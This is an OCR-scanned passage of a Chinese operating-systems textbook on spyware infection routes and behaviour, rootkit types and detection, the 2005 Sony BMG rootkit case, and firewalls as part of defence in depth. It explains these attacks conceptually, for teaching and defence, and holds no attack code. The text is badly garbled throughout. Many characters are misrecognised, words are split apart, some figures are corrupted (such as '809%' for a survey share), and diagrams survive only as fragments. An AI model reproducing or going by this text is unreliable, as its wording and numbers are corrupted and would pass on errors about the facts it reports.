要 快 。 其 结果 是 ， 越 来 越 多 的 反 蠕虫 技术 被 开发 出 来 ， 它 们 大 多 都 试 
图 在 蠕虫 第 一 次 出 现 的 时 候 将 其 发 现 ， 而 不 是 在 它们 进入 中 心 数据 库 
时 才 实 施 侦 测 (Portokalidis 和 Bos,2007) ° 


9.7.4 ”间谍 软件 


间谍 软件 (spyware) 是 一 种 迅速 扩散 的 恶意 软件 ， 粗 略 地 讲 ， 间 
谍 软 件 是 在 用 户 不 知情 的 情况 下 加 载 到 PC 上 的 ， 并 在 后 人 台 做 一 些 超出 
用 户 意 愿 的 事情 。 但 是 要 定义 它 却 出 乎 意料 的 微妙 。 比 如 Windows 目 
动 更 新 程序 下 载 安 全 组 件 到 安装 有 Windows 的 机 器 上 ， 用 户 不 需要 干 
预 。 同 样 地 ， 很 多 反 病 毒 软件 也 在 后 台 目 动 更 狐 。 上 述 的 两 种 情况 都 
不 被 认为 是 间谍 软件 。 如 果 Potter Stewart 还 健在 的 话 ， 他 也 许 会 
Ul: “我 不 能 定义 间谍 软件 ， 但 只 要 我 看 见 它 ， 我 下 知 道 。” 


其 他 人 通过 努力 ， 进 一 步 地 尝试 定义 间谍 软件 。Barwinski 等 人 认 
为 它 有 四 个 特征 : 首先 ， 它 隐藏 自身 ， 所 以 用 户 不 能 轻易 地 找到 ; 其 
次 ， 它 收集 用 户 数据 (如 访问 过 的 网 址 、 口 令 或 信用 卡号 ;再 次 ， 
它 将 收集 到 的 资料 传 给 远程 的 监控 者 ， 最 后 ， 在 印 载 它 时 ， 间 谍 软 件 
会 试图 进行 防御 。 此 外 ， 一 些 间 谍 软 件 改变 设置 或 者 进行 其 他 的 恶意 
行为 。 


Barwinski 等 人 将 间谍 软件 分 成 了 三 大 类 。 第 一 类 是 为 了 营销 : 该 
类 软件 只 是 简单 地 收集 信息 并 发 送 给 控制 者 ， 以 更 好 地 将 广告 投放 到 
特定 的 计算 机 。 第 二 类 是 为 了 监视 ， 某 些 公 司 故 意 在 职员 的 电脑 上 安 
装 间 谍 软 件 ， 监 祝 他 们 在 做 什么 ， 在 浏览 什么 网 站 。 第 三 类 接近 于 典 


型 的 恶意 软件 ， 被 感染 的 电脑 成 为 僵尸 网 络 中 的 一 部 分 ， 等 竺 控制 者 
的 指令 


他 们 做 了 一 个 实验 ， 通 过 访问 5000 个 网 站 看 什么 样 的 网 站 含有 间 
诬 软 件 。 他 们 发 现 这 些 网 站 和 成 人 娱乐 、 盗 版 软件 、 在 线 旅行 有 关 。 


华盛顿 大 学 做 了 一 个 覆盖 面 更 广 的 调查 (Moshchuk A, 
2006) 。 在 他 们 的 调查 中 ， 约 18 000 000 个 URL 被 感染 ， 并 且 69% 被 发 
现 含 有 间谍 软件 。 所 以 AOL/NCSA 所 作 的 调查 就 不 奇怪 了 : 在 接受 调 
查 的 家 用 计算 机 中 ，809% 深 受 间 谍 软 件 的 危害 ， 平 均 每 台 计算 机 有 93 
个 该 类 软件 。 华 盛 顿 大 学 的 调查 发 现成 人 、 明 星 和 桌面 壁纸 相关 的 网 
站 有 最 高 的 感染 率 ， 但 他 们 没有 调查 旅行 相关 的 网 站 。 


1. 间 读 软 件 如 何 打 散 


显然 ， 接 下 来 的 问题 是 : “一 台 计 算 机 是 如 何 被 间谍 软件 感染 
的 ? ”一 种 可 能 途径 和 所 有 的 恶意 软件 是 一 样 的 : 通过 木马 。 不 少 的 免 
费 软件 是 包含 有 间谍 软件 的 ， 软 件 的 开发 者 可 能 吏 是 通过 间谍 软件 而 
获 利 的 。P2P 文 件 共享 软件 (比如 Kazaa) 就 是 间谍 软件 的 温床 。 此 
外 ， 许 多 网 站 显示 的 广告 条 幅 直 接 指 向 了 含有 间谍 软件 的 网 页 。 


男 一 种 主要 的 感染 途径 叫做 下 载 驱动 (drive-by down load) , 1X 
仅 访 问 网 页 就 可 能 感染 间谍 软件 (实际 上 是 恶意 软件 ) 。 执 行 感染 的 
技术 有 三 种 。 首 完 ， 网 页 可 能 将 浏 贤 絮 导 辣 一 个 可 执行 文件 


(exe) 。 当 浏览 器 访问 此 文件 时 ， 会 弹出 一 个 对 话 框 提示 用 户 运 
行 、 或 保存 该 文件 。 因 为 合法 文件 的 下 载 也 是 一 样 的 机 制 ， 所 以 大 部 
分 用 户 直 接点 击 执 行 ， 导 致 浏 哎 器 下 载 并 运行 该 软件 。 然 后 电脑 束 被 
感染 了 ， 间 诬 软 件 可 以 做 它 想 做 的 任何 事 。 


第 二 种 常见 的 途径 是 被 感染 的 工具 条 。IE 和 Firefox 这 两 种 浏览 屁 
都 文 持 第 三 方 工具 条 。 一 些 间 谍 软 件 的 作者 创建 很 好 看 的 功能 也 不 错 
的 工具 条 ， 然 后 广泛 地 宣传 。 用 户 一 旦 安 儿 了 这 样 的 工具 条 也 束 被 感 
染 了 ， 比 如 ， 流 行 的 Alexa 工 具 条 整 舍 有 间谍 软件 。 从 本 质 上 讲 ， 这 种 
感染 机 制 很 像 木 蕊 ， 只 十 包 小 不 同 。 


第 三 种 感染 的 途径 更 狭 猎 。 很 多 网 页 都 使 用 一 种 微软 的 技术 ， 叫 
做 ActiveX 控 件 。 这 些 控件 是 在 浏览 右 中 运行 并 扩展 其 功能 的 二 进 制 代 
码 。 例 如 ， 显 示 某 种 特定 的 图 片 、 音 频 或 视频 网 页 。 从 原则 上 讲 ， 这 
些 技术 非常 合法 。 实 际 上 它 非常 的 危险 ， 并 可 能 是 间谍 软件 感染 的 主 
要 途径 。 这 项 技术 主要 针对 IE， 很 少 针对 Firefox 或 其 他 类 型 的 浏览 
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当 访 问 一 个 售 有 ActiveX 控 件 的 网 页 时 ， 发 生 什么 情况 取决 于 正 的 
性 设置 。 如 末 安 全 性 设置 太 低 ， 间 谍 软 件 整 目 动 下 载 并 执行 了 。 
性 设置 低 的 原因 是 如 果 设 置 太 高 ， 许 多 的 网 页 吏 无 法 正和 显示 

或 根本 无 法 显示 ) ， 或 者 IE 会 一 直 进 行 提示 ， 而 用 户 并 不 清楚 这 些 
提示 的 作用 。 


现在 我 们 假设 用 户 有 很 高 的 安全 性 设置 。 当 访问 一 个 被 感染 的 网 
页 时 ， 正 检测 到 有 ActiveX 探 件 ， 然 后 弹出 一 个 对 话 框 ， 包 含有 网 页 内 


容 提 示 ， 比 如 : 


你 希望 安 疼 并 运行 一 个 能 加 速 网 页 访问 的 程序 吗 ? 


大 多 数 人 认为 很 不 错 ， 然 后 点 “是 ”。 好 吧 ， 这 是 过 去 的 事情 。 陪 
明 的 用 户 可 能 会 检查 对 话 框 其 他 的 内 容 ， 还 有 其 他 两 项 。 一 个 是 指 回 
从 来 没有 听 说 过 的 ， 也 没有 包含 任何 有 用 信息 的 认证 中 心 的 链接 ， 这 
其 实 只 表明 该 认证 中 心 只 担保 这 家 网 站 的 存在 ， 并 有 足够 的 钱 文 付 认 
证 的 费用 。ActiveX 控 件 实际 上 可 以 做 任何 事情 ， 所 以 它 非常 强大 ， 并 
且 可 能 让 用 户 很 头疼 。 由 于 虚假 的 提示 信息 ， 即 使 聪明 的 用 户 也 第 第 


选择 "是 "。 


如 果 他 们 点 “不 是 ”， 在 网 页 上 的 脚本 则 利用 还 的 bug， 试 图 继续 下 
载 间 谍 软 件 。 不 过 没有 可 利用 的 bug， 束 会 一 次 次 试图 下 载 该 控件 ， 一 
次 次 的 弹出 同样 的 对 话 框 。 此 时 ， 大 多 数 人 不 知道 该 怎么 办 (打开 任 
务 管理 器 ， 杀 掉 IE 的 进程 ，， 所 以 他 们 最 终 放弃 并 选择 “是 ”。 


通常 情况 下 ， 下 一 步 古 间谍 软件 显示 20~~30 页 用 陌生 的 语言 撰写 
的 许可 凭证。 一 旦 用 户 接受 了 许可 和 插 证 ， 他 号 形 失 了 起 诉 间谍 软件 作 
者 的 机 会 ， 因 为 他 同意 了 该 软件 的 运行 ， 即 使 有 时 候 当地 的 法 律 并 不 
认可 这 样 的 许可 凭证 《如果 许可 和 凭证 上 说 “本 凭证 坚定 地 授予 凭证 发 放 
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难说 服 法 庭 ) 。 


2. 间 谍 软 件 的 行为 


现在 让 我 们 看 看 间谍 软件 的 常见 行为 : 
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更 改 用 户 默 认 的 搜索 引擎 。 

.在 Windows 桌 面 上 增加 新 的 图 标 。 
将 网 页 上 的 广告 条 蔡 换 成 间谍 软件 期 望 的 样子 。 


.在 标准 的 Windows 对 话 框 中 增加 广告 。 


:不 集 地 产生 广告 。 


最 前 面 的 三 条 改变 了 浏览 磊 的 行为 ， 即 使 重启 操作 系统 也 不 能 恢 
复 以 前 的 设置 。 这 种 攻击 叫做 支持 浏览 器 (brower hijacking) 。 接 下 


来 的 两 条 修改 了 Windows 注 册 表 的 设置 ， 把 用 户 引 向 了 另外 的 媒体 播 
Blas 〈 播 放 间谍 软件 所 期 望 的 广告 ) 和 搜索 引擎 (返回 间谍 软件 所 期 
望 的 网 页 ) 。 在 桌面 上 添加 图 标 显然 是 希望 用 户 运 行 新 安装 的 程序 。 
替换 网 页 广告 条 (468x60.gif 图 像 ， 就 像 所 有 被 访问 过 网 页 一 样 ， 为 间 
谍 软 件 指定 的 网 页 打 广 告 。 最 后 一 项 是 最 麻烦 的 : 一 个 可 关闭 的 广告 
立刻 产生 另 一 个 弹出 广告 ， 以 致 无 法 线束。 此外， 间谍 软 件 常 常 关闭 
防火 墙 、 熏 载 其 他 的 间谍 软件 ， 并 可 能 导致 其 他 的 恶意 行为 。 


许多 间谍 软件 有 番 载 程序 ， 当 这 些 印 载 程序 几乎 不 能 用 ， 所 以 经 
验 不 足 的 用 户 没 有 办 法 秋 载 。 举 运 的 是 ， 一 个 痢 的 反 间 谍 软 件 产 业已 
经 兴起 ， 现 有 的 反 病 毒 三 商 距 跃 欲 试 。 


间谍 软件 不 应 该 和 广告 软件 (adware) 混 清 起 来 ， 合 法 的 软件 生 
产 丙 提供 了 两 种 软件 版 本 : 一 个 售 有 广告 的 免费 版 本 和 一 个 不 含 广告 
的 付费 版 本 。 软 件 生产 商 的 这 种 办 法 非 沼 聪明， 用户 为 了 不 受 广 告 的 
烦 扰 ， 而 不 得 不 升级 到 付费 版 本 。 


9.7.5 rootkit 


rootkit 是 一 个 程序 或 一 些 程序 和 文件 的 集合 ， 它 试图 隐藏 其 自身 的 
存在 ， 即 使 被 感染 主机 的 拥有 者 已 经 决定 对 其 进行 定位 和 删除 。 在 通 
角 情况 下 ，rootkit 包 含 一 些 同 样 具 有 隐藏 性 的 恶意 软件 。rootkit 可 以 用 
我 们 目前 讨论 过 的 任 一 方法 进行 安装 ， 包 括 病毒 、 蠕 虫 和 间谍 软件 ， 
也 可 以 通过 其 他 方法 进行 安装 。 我 们 将 稍 后 讨论 其 中 的 一 种 。 


1.rootkit 的 类 型 


我 们 讨论 日 前 可 能 的 五 种 rootkit。 根 据 “rootkit 在 哪里 隐 着 自己 ”， 
我 们 上 自 底 向 上 将 rootkit 分 为 如 下 几 类 : 


1) 固 件 rootkit。 至少 从 理论 上 讲 ， 一 个 rootkit 可 以 通过 更 新 BIOS 来 
隐藏 目 己 在 BIOS 中 。 只 要 主机 被 引导 局 动 或 者 一 个 BIOS 芳 数 锐 调用， 
这 种 rootkit 就 可 以 获得 控制 。 如 果 rootkit 在 每 次 使 用 后 对 自己 加 密 而 在 
每 次 使 用 前 对 上 自己 解密 ， 它 就 很 难 被 发 现 。 这 种 rootkit 在 现实 环境 下 还 
没有 发 现 。 


2) 管 理 程序 rootkit。 这 是 一 种 尤其 蛙 吉 的 rootkit， 它 可 以 在 一 个 由 
目 己 控制 的 虚拟 机 中 运行 整个 操作 系统 和 所 有 应 用 程序 。 第 一 个 概念 
证 明 “ 蓝 药丸 ”(blue pl， 取 上 自 电影 《黑客 帝国 》) 在 2006 年 被 波兰 黑 
客 Joanna Rutkowska 提 出 。 这 种 rootkit 通 常 更 改 引 导 顺 序 以 便 它 能 在 主 


机 局 动 时 在 裸 机 下 执行 管理 程序 ， 这 个 管理 程序 会 在 一 个 虚拟 机 中 局 
动 操作 系统 和 所 有 应 用 程序 。 与 前 一 种 方法 类 似 ， 这 种 方法 的 优点 在 
于 没有 任何 东西 隐藏 在 操作 系统 、 库 或 者 程序 中 ， 因 此 检查 这 些 地 方 
的 rootkit 检 测 程序 束 显 得 不 足 。 


3) 内 核 rootkit。 目 前 最 常见 的 rootkit 感 染 操 作 系统 并 作为 驱动 程序 
或 可 引导 内 核 模块 隐藏 于 其 中 。 这 种 rootkit 可 以 轻松 地 将 一 个 大 而 复杂 
且 频 党 变化 的 驱动 程序 替换 为 一 个 新 的 驱动 程序 ， 这 个 新 的 驱动 程序 
既 包 含 原 驱 动 程序 又 包含 rootkit 。 


4) rootkit ° A—M rootkit] 以 隐藏 的 地 方 是 系统 库 ， 如 Linux 中 的 
libc。 这 种 位 置 给 恶意 软件 提供 了 机 会 去 检查 系统 调用 的 参数 和 返回 
值 ， 并 根据 自身 隐藏 的 需要 更 改 这 些 参数 和 返回 值 。 


5) 应 用 程序 rootkit。 另 一 个 隐藏 rootkit 的 地 方 是 在 大 的 应 用 程序 
中 ， 尤 其 是 那些 在 运行 时 会 创建 很 多 新 文件 的 应 用 程序 中 (如 用 户 分 
布 图 、 图 像 预 览 等 ) 。 这 些 新 文件 是 隐藏 rootkit 的 好 地 方 ， 没 有 人 会 怀 
疑 其 存在 。 


这 五 种 rootkit 可 以 隐藏 的 位 置 由 图 9-30 所 示 。 
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程序 


操作 系统 
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操作 系统 
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b) c) d) e) 
图 9-30 rootkit 可 以 隐藏 的 五 种 位 置 
2.rootkit 检 测 


当 硬 件 、 操 作 系统 、 库 和 应 用 程序 不 能 被 信任 时 ，rootkit 很 难 被 检 
测 到 。 例 如 ， 一 种 查找 rootkit 的 明显 方法 是 列举 磁盘 上 的 所 有 文件 ， 但 
苹 读 取 目 录 的 系统 调用 、 调 用 系统 调用 的 库 范 数 以 及 列表 程序 都 有 漠 


在 的 恶意 性 ， 并 有 可 能 忽略 掉 与 rootkit 相 关 的 文件 。 然 而 情况 也 绝 非 无 
可 救 药 。 


检测 一 个 引导 自己 的 管理 程序 并 在 其 控制 下 的 虚拟 机 中 运行 操作 
系统 和 应 用 程序 的 rootkit 虽 然 难 以 处 理 但 也 并 非 不 可 能 。 这 要 求 从 性 能 
和 功能 上 仔细 检查 虚拟 机 和 实际 机 器 的 细微 差异 。Garfinkel 等 (2007) 
已 经 提出 了 一 些 这 样 的 差异 (如 下 所 述 ) ，Carpenter 等 (2007) 也 讨 


论 了 这 个 话题 。 


一 类 检测 方法 依赖 于 一 个 事实 : 管理 程序 自身 使 用 物理 资源 而 失 
去 这 些 资源 可 以 被 检测 到 。 例 如 ， 管 理 程序 需要 使 用 一 些 TLB 入 口 ， 
在 这 些 稿 缺 资源 的 使 用 上 与 虚拟 机 产生 竞争 。rootkit 检 测 程序 可 以 辣 
TLB 施 加 压力 ， 观 穴 其 性 能 并 与 此 前 在 裸 机 上 测量 的 性 能 数据 进行 比 


较 。 


男 一 类 检测 方法 与 计时 相关 ， 尤 其 与 虚拟 输入 输出 设备 的 计时 相 
关 。 假 设 在 实际 机 器 上 读 出 一 些 PCI 设 备 寄存 器 需要 100 个 时 钟 周期 ， 
这 个 时 间 很 容易 重 现 。 在 一 个 虚拟 环境 下 ， 这 个 寄存 器 的 值 来 自 于 内 
存 ， 它 的 读 取 时 间 依 赖 于 它 到 底 在 CPU 一 级 缓存 、 二 级 缓存 还 是 实际 
RAM 中 。 检 测 程序 可 以 轻易 地 强迫 其 在 这 些 状 态 之 间 来 回 移动 并 测量 
实际 读 取 时 间 的 变化 。 注 意 我 们 关注 的 是 读 取 时 间 的 变化 而 非 实际 的 
读 取 时 间 。 


男 一 个 可 以 被 探查 的 部 分 是 执行 特权 指令 的 时 间 ， 尤 其 是 对 那些 
在 实际 硬件 上 只 需要 几 个 时 钟 周期 而 在 被 模拟 时 需要 几 百 或 几 千 个 时 
钟 周期 的 特权 指令 。 例 如 ， 如 果 读 出 某 个 被 保护 的 CPU 寄 存 侣 在 实际 
硬件 环境 下 需要 1 纳 秒 ， 那 么 10 亿 次 软 中 断 和 模拟 绝 不 可 能 在 1 秒 内 完 
成 。 当 然 ， 管 理 程序 可 以 欺骗 报告 模拟 时 间 而 不 报告 所 有 涉及 时 间 的 
系统 调用 的 实际 时 间 ， 检 测 程序 可 以 通过 连接 提供 精确 时 间 基 准 的 远 
程 主机 或 网 站 来 绕 过 时 间 模 拟 。 因 为 检测 程序 只 需要 测量 时 间 间 隔 


(例如 ， 执 行 10 亿 次 被 保护 寄存 器 的 读 操 作 需 要 多 少时 间 ) ， 本 地 时 
钟 和 远程 时 钟 的 偏 移 没有 关系 。 


如 采 没 有 管理 程序 被 塞 入 硬件 和 操作 系统 之 间 ， 那 么 rootkit 可 能 被 
隐藏 在 操作 系统 中 。 很 难 通过 引导 计算 机 来 检测 其 存在 ， 因 为 操作 系 
统 是 不 可 信 的 。 例 如 ，rootkit 可 能 安装 大 量 的 文件 ， 这 些 文件 的 文件 名 
都 由 “$$$_” 起 始 ， 当 读 取 代表 用 户 程 序 的 目录 时 ， 不 报告 这 些 文件 的 
存在 。 


在 这 样 的 环境 下 检测 rootkit 的 一 个 方法 是 从 一 个 可 信 的 外 部 介质 
(如 CD-ROMDVD 或 USB 棒 ) 引导 计算 机 ， 然 后 磁盘 可 以 被 一 个 反 
rootkit 程 序 扫描 ， 这 时 不 用 担心 rootkit 会 干扰 这 个 扫描 。 另 一 个 选择 是 
对 操作 系统 中 的 每 个 文件 做 密码 散 列 ， 这 些 散 列 值 可 以 与 一 个 列表 中 
的 散 列 值 进行 比较 ， 这 个 列表 在 系统 安装 的 时 候 生成 并 存储 于 系统 外 
的 一 个 不 可 被 自 改 的 位 置 。 如 果 没 有 预先 建立 这 些 散 列 值 ， 也 可 以 由 
安装 CD-ROM 或 DVD 即时 计算 得 到 ， 或 由 被 比较 文件 目 壬 进行 计算 得 
到 。 


库 和 应 用 程序 中 的 rootkit 更 难 隐 藏 ， 当 操作 系统 从 一 个 外 部 介质 装 
入 并 可 信 时 ， 这 些 库 和 应 用 程序 的 散 列 值 也 可 以 与 已 知 为 正确 且 存 储 
与 CD-ROM 上 的 散 列 值 进行 比较 。 


到 目前 为 止 ， 我们 讨论 的 都 是 被动 rootkit， 它 们 不 会 干扰 检测 软 
件 。 还 存在 一 些 主动 rootkit， 它 们 查找 并 破坏 检测 软件 或 至 少将 检测 软 
件 更 改 为 永远 报告 “NO ROOTKITS FOUND!” (没有 发 现 rootkit) ， 这 
些 rootkit 要 求 更 复杂 的 检测 方法 。 笠 和 运 的 是 ， 到 目前 为 止 在 现实 环境 下 
主动 rootkit 还 没有 出 现 。 


在 发 现 rootkit 后 应 该 做 什么 这 个 问题 上 存在 两 种 观点 。 一 种 观点 认 
为 系统 管理 员 应 该 像 处 理 冶 症 的 外 科 医 生 那 样 非常 小 心地 切除 它 。 男 
一 种 观点 认为 笑 试 移 除 rootkit 太 过 人 危险， 可 能 还 有 其 他 雄 厂 隐藏 在 其 他 
地 方 ， 在 这 一 观点 下 ， 惟 一 的 解决 办 法 是 回复 到 上 一 个 已 知 干净 的 完 
整备 份 。 如 果 没 有 可 用 的 备份 ， 就 要 求 从 原始 CD-ROM/DVD 进 行 新 的 


3.Sony rootKit 


在 2005 年 ，Sony BMG 公司 发 行 了 一 些 包含 rootkit 的 音乐 CD。 这 被 
Mark Russinovich (Windows 管 理工 具 网 站 www.sysinternals.com 的 共同 
创始 人 之 一 ) 发 现 ， 那 时 他 正在 开发 一 个 rootkit 检 测 工具 并 惊奇 地 在 自 
己 的 系统 中 找到 了 一 个 rootkit。 他 在 自己 的 blog 中 写 下 了 这 件 事 ， 这 很 
快 传 遍 了 各 大 媒体 和 互联 网 。 一 些 科技 论文 与 此 相关 (Arabi 
Hutchison,2006;Bishop 和 Frincke,2006;Felten 和 


Halderman,2006:Halderman 和 Felten,2006;Levine et al.,2006) 。 这 件 事 导 
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当 用 户 插入 CD 到 一 个 Windows 系 统计 算 机 的 驱动 器 中 时 ， 
Windows 查 找 一 个 名 为 autorun.inf 的 文件 ， 其 中 包含 了 一 系列 要 执行 的 
动作 ， 通 常 包括 打开 一 些 CD 上 的 程序 (如 安装 向 导 ) 。 正 常情 况 下 ， 
音乐 CD 没有 这 些 文件 因为 即便 它们 存在 也 会 被 单机 CD 播放 器 忽略 。 显 
然 Sony 的 某 个 天 才 认 为 他 可 以 聪明 地 通过 放置 一 个 autorun.inf 文 件 在 一 
些 CD 上 来 防止 音乐 盗版 % 当 这 些 CD 插 入 计算 机 时 ， 束 会 立即 安静 地 安 
装 一 个 12MB 大 小 的 rootkit。 然 后 一 个 许可 协议 被 显示 ， 其 中 没有 提 到 
任何 关于 软件 被 安装 的 信息 。 在 显示 许可 的 同时 ，Sony 的 软件 检查 是 
否 有 200 种 已 知 的 复制 软件 中 的 任 一 种 正在 运行 ， 如 果 有 的 话 就 命令 用 
户 停 止 这 些 复制 软件 。 如 果 用 户 同意 许可 协议 并 关闭 了 所 有 的 复制 软 
件 ， 音 乐 将 可 以 播放 ， 否 则 音乐 就 不 能 播放 。 即 使 用 户 拒绝 协议 ， 
rootkit 仍 然 被 安装 。 


这 个 rootkit 的 工作 方法 如 下 。 它 同 Windows 内 核 插 入 一 系列 文件 名 
由 “$sys$” 起 始 的 文件 。 这 些 文件 之 一 古 一 个 过 滤 如 ， 这 个 过 滤 紫 截取 
所 有 向 CD-ROM 驱 动 器 的 系统 调用 并 蔡 止 除 Sony 的 首 乐 播放 絮 之 外 的 
所 有 程序 读 取 CD。 这 一 动作 使 得 复制 CD 到 硬盘 (这 是 合法 的 ) 变 得 不 
可 能 。 另 一 个 过 滤 亏 截取 所 有 读 取 文件 、 进 程 和 注册 表 列 表 的 调用 ， 
并 删除 所 有 由 “$sys$” 起 始 的 项 (即便 这 些 项 是 由 与 Sony 和 首 乐 都 完全 


无 关 的 程序 而 来 的 ) ， 目 的 是 为 了 掩盖 rootkit。 这 一 方法 对 于 rootkit 设 
计 新 手 来 说 非常 标准 。 


在 Russinovich 发 现 这 一 rootkit 之 前 ， 它 已 经 被 广泛 地 安装 ， 这 完全 
不 令 人 惊讶 ， 因 为 在 超过 2000 万 张 CD 上 包含 此 rootkit。Dan Kaminsky 
(2006) 研究 了 其 广度 并 发 现 全 世界 超过 50 万 个 网 络 中 的 计算 机 已 经 


当 消 息 传 出 时 ，Sony 的 第 一 回应 是 它 有 权 保 护 其 知识 产权 。 在 
National Public Radio 的 一 次 采访 中 ，Sony BMG 的 全 球 数字 业务 主席 
Thomas Hesse: “我 认为 绝 大 多 数 人 甚至 不 知道 什么 是 rootkit， 那 么 
他 们 何必 那么 在 意 它 ? ” 当 这 一 回应 激 起 了 公众 怒火 时 ，Sony 让 步 并 发 
行 了 一 个 补丁 来 移 除 对 “$sys$” 文 件 的 掩盖 ， 但 仍 保 留 rootkit。 随 着 压力 
的 增加 ，Sony 最 终 在 其 网 站 上 发 布 了 一 个 外 载 程序 ， 但 作为 获得 外 载 
程序 的 条 件 ， 用 户 必须 提供 一 个 E-mail 地 址 并 同意 Sony 可 以 在 以 后 向 他 
们 发 送 宣传 材料 (这些 可 以 被 大 多 数 人 过 滤 掉 ) 。 


随 着 故事 的 终结 ， 人 们 发 现 Sony 的 外 载 程序 存在 技术 缺陷 ， 使 得 
被 感染 的 计算 机 非常 容易 遭受 互联 网 上 的 攻击 。 人 们 还 发 现 该 rootkit 包 
含 了 从 开源 项 目 而 来 的 代码 ， 这 违反 了 这 些 开源 项 目的 著作 权 (这 些 
开源 项 目的 著作 权 要 求 对 其 软件 的 免费 使 用 也 发 布 源 代码 ) 。 
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斯 州 控告 Sony 违 反 了 其 反 间 谍 软 件 法 以 及 欺诈 性 贸易 惯例 法 (因为 即 
使 许可 被 拒绝 rootkit 仍 然 会 被 安装 ) 。 此 后 在 39 个 州都 提起 了 公诉 。 在 
2006 年 12 月 ， 在 Sony 同 意 文 付 425 万 美元 、 同 意 停 止 在 其 未 来 的 CD 中 
放 入 rootkit 并 授权 每 位 受害 者 可 以 下 载 一 个 有 限 的 音乐 目录 下 的 三 张 专 
辑 之 后 ， 这 些 诉讼 得 以 解决 。 在 2007 年 1 月 ，Sony 承 认 其 软件 秘密 监视 
用 户 的 收听 习惯 并 将 其 报告 回 Sony 也 违反 了 美国 法 律 。 在 与 公平 贸 
委员 会 (FTC) 的 协议 中 ，Sony 同 意 支付 那些 计算 机 遭 到 其 软件 破坏 
的 用 户 150 美 元 的 补偿 。 


关于 Sony 的 rootkit 的 故事 已 经 为 每 一 位 曾经 认为 rootkit 只 是 学 术 上 
的 稀奇 事物 而 与 现实 世界 无 天 的 读者 提供 了 实例 。 在 互联 网 上 搜 
索 “Sony rootkit” 会 发 现 大 量 补 充 信息 。 


9.8 防御 


面 对 和 危机 四 伏 的 状况 ， 那 么 还 有 确保 系统 安全 的 可 能 吗 ? 当然 ， 
征 有 的 ， 下 面 的 小 节 要 介绍 一 下 几 种 设计 和 实现 系统 的 方法 来 提高 它 
们 的 安全 性 。 一 个 最 重要 的 概念 就 是 全 面 防御 (defense in depth) 。 基 
本 地 讲 ， 这 个 概念 是 指 你 必须 有 多 层 的 安全 性 ， 以 便于 当 其 中 的 一 层 
被 破坏 ， 仍 然 还 有 其 他 层 要 去 防御 。 想 象 一 下 这 样 的 一 个 房子 ， 有 一 
个 高 的 带 钉子 的 关闭 着 的 铁 栅栏 ， 在 院子 里 有 运动 检测 器 ， 前 门 上 有 
两 把 做 工 精良 的 锁 ， 屋 子 里 还 有 一 个 计算 机 控制 的 盗 安 报 警 系统 。 每 
一 个 技术 上 自己 本 身 都 是 有 价值 的 ， 为 了 净 入 这 个 房子 盗贼 需要 打败 所 
有 的 防御 。 一 个 安全 的 计算 机 系统 束 应 该 像 这 个 房子 一 样 ， 有 着 多 层 
的 安全 性 。 我 们 将 要 介绍 其 中 的 某 些 层次 。 防 御 不 是 真 的 分 等 级 的 ， 
而 是 我 们 要 从 一 般 的 外 部 的 东西 开始 ， 然 后 逐渐 深入 到 细 广 。 


9.8.1 防火 墙 


能 够 把 任何 地 方 的 一 台 计 算 机 连接 到 其 他 一 台 任 何 地 方 的 计算 机 
上 是 一 件 好 坏 参 半 的 事情 。 网 络 上 有 很 多 有 价值 的 资料 ， 但 是 同时 连 
接 到 Internet 上 也 使 我 们 的 计算 机 面临 看 两 种 危险 : 来 目 外 部 和 来 目 内 
部 。 来 目 外 部 的 危险 包括 黑客、 病毒 、 间 谍 软 件 以 及 其 他 的 恶意 软 


件 。 来 自 内 部 的 危险 包括 了 机 密 信 息 泄露 ， 比 如 信用 卡号 、 密 码 、 纳 
税 申请 单 和 各 种 各 样 的 公司 信息 。 


因此 ， 我 们 需要 某 种 机 制 来 保证 “好 ”的 留 下 来 并 且 阻止 <* 坏 ”的 进 
入 。 一 种 方法 是 使 用 防火 墙 \firewall) ， 它 是 一 种 中 世纪 古老 的 安全 
措施 的 现代 版 本 : 在 你 的 城堡 周围 挖 一 条 护城河 。 这 样 的 设计 强制 每 
一 个 进入 或 者 离开 城堡 的 人 都 要 经 过 惟一 的 一 座 吊桥 ，IO 和 警察 可 以 在 
吊桥 上 检查 每 一 个 经 过 的 人 。 对 于 网 络 ， 这 种 方法 也 是 可 行 的 ， 一 个 
公司 可 能 有 很 多 的 任意 连接 的 局 域 网 ， 但 是 所 有 进入 或 离开 公司 的 网 
络 流 都 要 强制 地 通过 一 个 电子 吊桥 一 一 防火 墙 。 


防火 墙 有 两 种 基本 的 类 型 :硬件 防火 墙 和 软件 防火 墙 。 有 局 域 网 
需要 保护 的 公司 通常 选择 硬件 防火 墙 ， 而 家 庭 的 个 人 用 户 通常 会 选择 
软件 防火 墙 。 首 先 ， 让 我 们 看 一 看 硬件 防火 墙 。 一 般 的 硬件 防护 墙 如 
图 9-31 所 示 。 在 该 图 中 ， 来 自 网 络 提供 者 的 连接 (BOC) 会 被 插 
到 防火 墙 上 ， 防 火 墙 也 连接 到 局 域 网 上 。 不 经 过 防火 墙 的 允许 任何 包 
都 不 能 进入 或 者 离开 局 域 网 。 实 际 的 情况 下 ， 防 护 墙 通常 会 和 路 由 
鲁 、 网 络 地 址 转换 使、 指令 检查 系统 和 其 他 设备 联合 起 来 工作 ， 但 是 
在 这 里 我 们 只 关注 于 防火 墙 目 身 的 功能 。 


207.68.160.190:80 207.68.160.191:25 207.68.160.192:21 
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图 9-31 一 个 由 防火 墙 保护 的 局 域 网 示意 图 ( 含 三 台 主 机 ) 


防火 墙根 据 一 些 规 则 来 配置 ， 这 些 规则 插 述 什么 古人 允许 的 ， 什 么 
征 不 允许 的 。 防 护 载 的 管理 者 可 以 修改 这 些 规则 ， 通 党 修改 是 通过 一 
个 Web 界 面 进 行 的 (大 多 数 防火 墙 都 内 置 一 个 小 型 Web 服 务 器 来 实现 
E) 。 最 简单 的 一 种 防护 墙 是 无 状态 防护 墙 (stateless firewall) ， 只 会 
仿 查 通过 的 包 的 头 部 ， 然 后 根据 包头 部 的 信息 和 防火 墙 的 规则 作出 传 
送 还 是 丢弃 这 个 包 的 决定 。 包 头 部 的 信息 包括 源 和 目的 的 IP 地 址 、 源 
和 目的 的 端口 、 服 务 的 类 型 和 协议 。 包 头 部 的 其 他 属性 也 是 可 以 得 到 
的 ,但 是 很 少 会 被 防火 墙 的 规则 涉及 。 


在 图 9-31 中 ， 我 们 有 3 个 服务 器 ， 每 一 个 都 有 一 个 惟一 的 耳 地 址 ， 
形 如 207.68.160.x， 其 中 x 依次 是 190、191、192。 这 三 个 地 址 就 是 那些 
要 发 送 给 这 些 服 务 器 的 包 的 目的 地 址 。 进 来 的 包 同 时 也 包含 一 个 16 位 
